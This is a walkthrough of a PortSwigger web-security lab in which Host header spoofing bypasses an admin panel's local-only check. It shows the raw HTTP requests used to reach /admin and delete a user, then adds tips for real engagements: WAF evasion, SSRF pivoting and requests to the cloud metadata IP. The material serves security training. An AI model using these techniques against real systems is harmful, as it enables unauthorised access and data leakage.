[This lab makes](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-authentication-bypass) an assumption about the privilege level of the user based on the HTTP Host header.
1. **Identify Host header control**
* Send `GET /` in Burp Repeater.
* Modify `Host:` to random value — still returns **200** → Host header not validated.
![[CleanShot 2025-08-12 at
[email protected]]]
1. **Locate hidden admin panel**
* Check `/robots.txt` → reveals `/admin`.
![[CleanShot 2025-08-12 at
[email protected]]]
1. **Test privilege condition**
* Direct `GET /admin` → access denied.
* Error says: *only accessible to local users*.
4. **Bypass via Host header spoofing**
* In Burp Repeater:
```
GET /admin HTTP/1.1
Host: localhost
```
* Response: Admin panel accessible.
![[CleanShot 2025-08-12 at
[email protected]]]
5. **Exploit admin function**
* Change request line:
```
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
```
* Send → user deleted → lab solved.
---
#### Tricks for Real-World Engagements
* **Automated detection:**
* In Burp, create a match/replace rule to inject `Host: localhost` into all requests, watch for access changes.
* **Bypass WAFs:**
* Use alternative Host header casing (`HoSt:`), multiple Host headers, or add `X-Forwarded-Host: localhost` for load balancer trickery.
* **Pivoting:**
* Combine with SSRF — use the poisoned Host header to force backend service-to-service calls.
* **Enumeration:**
* Swap `localhost` for `127.0.0.1`, `::1`, internal hostnames, or AWS metadata IP (`169.254.169.254`) for extra data leakage.